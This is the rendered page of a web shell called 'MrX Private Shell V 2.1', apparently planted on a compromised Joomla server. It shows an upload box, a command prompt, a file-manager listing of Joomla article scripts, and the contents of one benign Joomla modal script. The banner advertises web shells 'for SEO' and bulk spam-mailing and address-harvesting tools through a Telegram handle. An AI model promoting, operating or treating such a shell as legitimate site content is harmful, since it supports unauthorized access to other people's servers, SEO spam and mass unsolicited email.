__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/**
 * @copyright  (C) 2018 Open Source Matters, Inc. <https://www.joomla.org>
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */
(() => {

  // Use a JoomlaExpectingPostMessage flag to be able to distinct legacy methods
  if (window.parent.JoomlaExpectingPostMessage) {
    return;
  }

  /**
    * Javascript to insert the link
    * View element calls jSelectArticle when an article is clicked
    * jSelectArticle creates the link tag, sends it to the editor,
    * and closes the select frame.
    * */
  window.jSelectArticle = (id, title, catid, object, link, lang) => {
    console.warn('Method jSelectArticle() is deprecated. Use postMessage() instead.');
    if (!Joomla.getOptions('xtd-articles')) {
      return;
    }
    const {
      editor
    } = Joomla.getOptions('xtd-articles');
    const tag = `<a href="${link}"${lang !== '' ? ` hreflang="${lang}"` : ''}>${title}</a>`;
    window.parent.Joomla.editors.instances[editor].replaceSelection(tag);
    if (window.parent.Joomla.Modal && window.parent.Joomla.Modal.getCurrent()) {
      window.parent.Joomla.Modal.getCurrent().close();
    }
  };
  document.querySelectorAll('.select-link').forEach(element => {
    // Listen for click event
    element.addEventListener('click', event => {
      event.preventDefault();
      const {
        target
      } = event;
      const functionName = target.getAttribute('data-function');
      if (functionName === 'jSelectArticle' && window[functionName]) {
        // Used in xtd_contacts
        window[functionName](target.getAttribute('data-id'), target.getAttribute('data-title'), target.getAttribute('data-cat-id'), null, target.getAttribute('data-uri'), target.getAttribute('data-language'));
      } else if (window.parent[functionName]) {
        // Used in com_menus
        window.parent[functionName](target.getAttribute('data-id'), target.getAttribute('data-title'), target.getAttribute('data-cat-id'), null, target.getAttribute('data-uri'), target.getAttribute('data-language'));
      }
      if (window.parent.Joomla.Modal && window.parent.Joomla.Modal.getCurrent()) {
        window.parent.Joomla.Modal.getCurrent().close();
      }
    });
  });
})();

Filemanager

Name Type Size Permission Actions
admin-article-pagebreak.js File 937 B 0664
admin-article-pagebreak.min.js File 610 B 0664
admin-article-pagebreak.min.js.gz File 375 B 0664
admin-article-readmore.js File 1.03 KB 0664
admin-article-readmore.min.js File 752 B 0664
admin-article-readmore.min.js.gz File 481 B 0664
admin-articles-default-batch-footer.js File 903 B 0664
admin-articles-default-batch-footer.min.js File 489 B 0664
admin-articles-default-batch-footer.min.js.gz File 347 B 0664
admin-articles-default-stage-footer.js File 853 B 0664
admin-articles-default-stage-footer.min.js File 458 B 0664
admin-articles-default-stage-footer.min.js.gz File 328 B 0664
admin-articles-modal.js File 2.16 KB 0664
admin-articles-modal.min.js File 1.28 KB 0664
admin-articles-modal.min.js.gz File 566 B 0664
articles-list.js File 696 B 0664
articles-list.min.js File 486 B 0664
articles-list.min.js.gz File 321 B 0664
articles-status.js File 393 B 0664
articles-status.min.js File 323 B 0664
articles-status.min.js.gz File 261 B 0664
form-edit.js File 931 B 0664
form-edit.min.js File 508 B 0664
form-edit.min.js.gz File 383 B 0664
Filemanager